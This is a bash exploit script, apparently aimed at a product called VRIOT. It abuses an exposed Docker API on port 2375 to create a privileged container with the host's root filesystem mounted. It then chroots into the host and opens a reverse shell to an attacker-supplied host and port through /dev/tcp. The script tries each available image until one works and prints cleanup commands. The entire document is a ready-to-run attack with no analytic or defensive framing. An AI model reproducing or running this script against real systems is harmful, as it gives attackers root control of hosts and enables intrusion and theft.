#!/bin/bash # Usage: ./vriot_shell.sh if [ $# -ne 2 ]; then echo "Usage: $0 " echo "Example: $0 192.168.13.37 8080" exit 1 fi LHOST="$1" LPORT="$2" DOCKER_API="http://localhost:2375" echo "[+] Target: ${LHOST}:${LPORT}" echo "[+] Finding existing Docker images on VRIOT..." IMAGES=$(curl -s ${DOCKER_API}/images/json) IMAGE_IDS=$(echo "$IMAGES" | jq -r '.[] | select(.RepoTags != null and .RepoTags[0] != "") | .Id') if [ -z "$IMAGE_IDS" ]; then IMAGE_IDS=$(echo "$IMAGES" | jq -r '.[].Id') fi if [ -z "$IMAGE_IDS" ]; then echo "[!] No images found on system" exit 1 fi for IMAGE_ID in $IMAGE_IDS; do IMAGE_NAME=$(echo "$IMAGES" | jq -r ".[] | select(.Id==\"$IMAGE_ID\") | .RepoTags[0] // \"$IMAGE_ID\"") echo "[+] Attempting with image: $IMAGE_NAME" CREATE_RESPONSE=$(curl -s -X POST ${DOCKER_API}/containers/create \ -H "Content-Type: application/json" \ -d "{ \"Image\": \"$IMAGE_ID\", \"Cmd\": [\"sh\", \"-c\", \"chroot /host /bin/bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'\"], \"HostConfig\": { \"Privileged\": true, \"Binds\": [\"/:/host\"] } }") CONTAINER_ID=$(echo "$CREATE_RESPONSE" | jq -r .Id) if [ "$CONTAINER_ID" != "null" ] && [ -n "$CONTAINER_ID" ]; then echo "[+] Container created: $CONTAINER_ID" START_RESPONSE=$(curl -s -X POST ${DOCKER_API}/containers/${CONTAINER_ID}/start) if [ -z "$START_RESPONSE" ]; then sleep 1 STATE=$(curl -s ${DOCKER_API}/containers/${CONTAINER_ID}/json | jq -r .State.Status) echo "[+] Container state: $STATE" echo "[+] Reverse shell triggered successfully!" echo "[+] Check your listener on ${LHOST}:${LPORT}" echo "" echo "[*] Container ID: $CONTAINER_ID" echo " Cleanup: curl -X DELETE ${DOCKER_API}/containers/${CONTAINER_ID}?force=true" exit 0 else echo "[!] Start failed with $IMAGE_NAME:" echo "$START_RESPONSE" | jq . curl -s -X DELETE ${DOCKER_API}/containers/${CONTAINER_ID}?force=true > /dev/null fi else echo "[!] Failed to create container with $IMAGE_NAME" echo "$CREATE_RESPONSE" | jq . fi done echo "[!] All images exhausted. No shell." exit 1